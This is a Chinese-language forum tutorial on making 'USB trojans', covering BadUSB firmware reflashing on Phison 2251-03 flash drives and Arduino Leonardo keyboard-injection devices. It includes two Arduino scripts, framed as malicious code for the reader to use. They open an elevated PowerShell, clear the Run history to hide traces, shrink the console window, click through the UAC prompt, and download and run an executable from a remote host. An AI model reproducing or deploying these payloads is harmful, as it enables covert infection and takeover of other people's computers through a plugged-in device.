0x00 前言
   因为这篇文章的发布正好卡在春节期间，导致作者的电子元件都被推迟到二月中旬发货，所以先写本篇文章解释大致的概念和步骤，更详细的介绍在不久后我会再发布的，另外祝大家新年拿到新0day！

0x01 邪恶的U盘

U盘木马是一个很有意思且实用的东西，他就想XXOO一样，只要插进去之后主机就会中（huai）毒（yun），在国内很少有关于U盘木马木马的技术性文章（与其他方面相比）U盘木马的确小众，在我最开始学习U盘木马的时候我连一篇文章都找不到，因此为了填补这个空缺本篇文章将会详细说明U盘木马的原理及制作。

0x02 BadUSB
    BadUSB的起源是在2014年美国黑帽大会上，柏林SRLabs的安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”(按照BadBIOS命名)的攻击方法，这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。
    利用USB口入侵有两种攻击方案，一种是下面说的BadUSB，第二种就是用开发板将自己伪装成例如键盘、网卡等设备，例如橡皮鸭（这玩意挺坑的，你去淘宝上找丫880一个）就是伪装成键盘的。
    但是请注意，上述方法只是利用USB口而不是USB闪存，那种方法需要单片机，但BadUSB却只需要要普通的U盘就可以，USB闪存由引导模块和储存部分组成，你可以尝试拆开一个U盘看一看里边的样子，我推荐去补天兑换那个6库币的银色16GU盘，那个很容易开。

0x03 特殊的“普通U盘”变BadUSB

在很久之前利用hacksaw可以让任意U盘化身一个BadUSB但是很可惜在之后他就无法使用了

不过我们依然有办法让家用普通U盘变为BadUSB，虽然我们利用的是家用的普通U盘，但实际上对U盘还是有要求的，我们需要一个带有Phison 2303（2251-03）微处理器的USB 3.0闪存驱动器，下面的图中是带有此处理器U盘型号，推荐你们使用Toshiba TransMemory-MX USB 3.0东芝的这款，购买链接：https://item.jd.com/946270.html

在开始前我们要确定我们的U盘是可用的，你可以用提取U盘信息的软件核实U盘的引导模块，如果微处理器的确为Phison 2251-03那就可以继续下面的步骤    我们借用github上的脚本来进行操作，首先你需要下载一个编译器:VS，然后还需要刷一下固件所以要找一个Burner Image，它是在你的设备上倾倒与刷新固件所需。它们通常使用“BNxxVyyyz.BIN”规则来命名（下载链接：http://www.usbdev.ru/files/phison/）。最后下载Duck Encoder，他是基于Java平台的工具，可以将脚本转化为HID负载。这个是建立于黑客Hak5发开的、被称为“Rubber Ducky”的Bad-USD（下载链接：https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Downloads）。
    然后刷取固件，写入脚本就可以，详细的做法请参见http://www.freebuf.com/articles/terminal/82238.html
    既然你刷了固件就意味着你无法继续使用此U盘领取，如果你依然固执想要复原有盘那就必须短接flash
badusb恢复.zip (2.72 MB, 下载次数: 15)
这个就是恢复badusb的文件，里面也有还原方法，这个文件可能网上也几乎找不到了，比较珍贵，所以推荐你先下载下来

以上方法就是利用了USB闪存的引导模块，刷固件然后写个脚本生成固件，当然刚刚引用的那个链接是借用的github的脚本，因为笔者也没有PS 2251-03的U盘，而且这种方法的确不常用，所以就不细说了。

0x04 TEENSY

这才是比较常用的方案，利用单片机、开发板来进行入侵，我们讲一下怎样利用最常见的Arduino制作U盘木马黑遍大江南北
其实这种方法极其简单，你只需要在Arduion里的IDE输入代码就行，而恶意代码网上有很多可以参考的

准备材料：（a）一个Arduino的模拟USB开发板（购买链接：https://item.taobao.com/item.htm?spm=a230r.1.14.25.TVzX5U）
                 （b）Arduino的IDE（下载链接：http://www.arduino.cn/thread-5838-1-1.html）
                 （c）安卓数据线
                 （d）超短micro转USB
                 （e）电脑

Arduino一定买我给的链接的那种，咱们需要的是Arduino Leonardo，也就十几到二十左右，不要瞎买

就是这种的，不过因为他的这个USB是小USB也就是咱们安卓手机的那种，所以你还需要一个转接头的，然后载入Arduino的IDE输入代码，记得要在IDE的工具一栏中选择正确的开发板和COM口，咱们的这个选Arduino Leonardo然后编译即可，整个步骤非常简单连接开发板，输入代码，拔出开发板

其实制作这样的U盘很简单的，如果说难度的话大概就在于脚本的编写，我引用他人的脚本你们看一下

Keyboard.println("powershell.exe -command start-process powershell -verb runAs");  /*开启管理员级别的powershell*/Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); /*清除运行窗口产生的记录*/Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //让cmd窗口变成一个很小的窗口Keyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT"); //利用powershell 定义一个对象Keyboard.println("$P.dOWNLOADfILE('HTTP://192.168.0.109/SUPER.EXE','c:\\SUPER.EXE')");  /*从服务端下载病毒 服务器地址和木马自己指定 还有木马将在目标机上存放的地址 自己设置*///自己想了一个比较笨的方法绕过UAC  就是询问管理员是否同意的那个框框Keyboard.press(KEY_LEFT_ARROW); //按住左方向键Keyboard.release(KEY_LEFT_ARROW); //释放左方向键Keyboard.press(KEY_RETURN); //按下回车键Keyboard.release(KEY_RETURN);//释放enter键

如果你想自己编写脚本那你就要学学Arduino了，其实也不算难的，网上代码有很多，下面这个也可以

void setup() {//初始化，这里的代码只执行一次Keyboard.begin();//开始键盘通讯delay(3000);//延时 避免初始化对后面产生影响，不宜太短Keyboard.press(KEY_LEFT_GUI);//按下win键delay(500);Keyboard.press('r');//按下r键delay(500);Keyboard.release(KEY_LEFT_GUI);//释放win键Keyboard.release('r');//释放r键delay(500);Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//输入并回车delay(1000);Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");delay(1000);Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.1.102/x.exe';$file = ' C:\\x.exe ';$clnt.DownloadFile($url,$file);");delay(3000);Keyboard.println("c:\\x.exe&exit");Keyboard.end();//结束键盘通讯}void loop()//循环，这里的代码无限循环{}

不过虽然网上代码很多，但大部分都比较简陋，如果你想提升一下最好别单纯复制，比较非难事

0x05 最后总结
U盘木马实际上依靠的就是伪装自己成为网卡、键盘等设备然后入侵，因为作者的确没有实验装置，所以，如何入侵、代码如何编写下期再讲，谢谢！

更多文章请看：http://bbs.ichunqiu.com/forum.php?mod=collection&action=view&ctid=48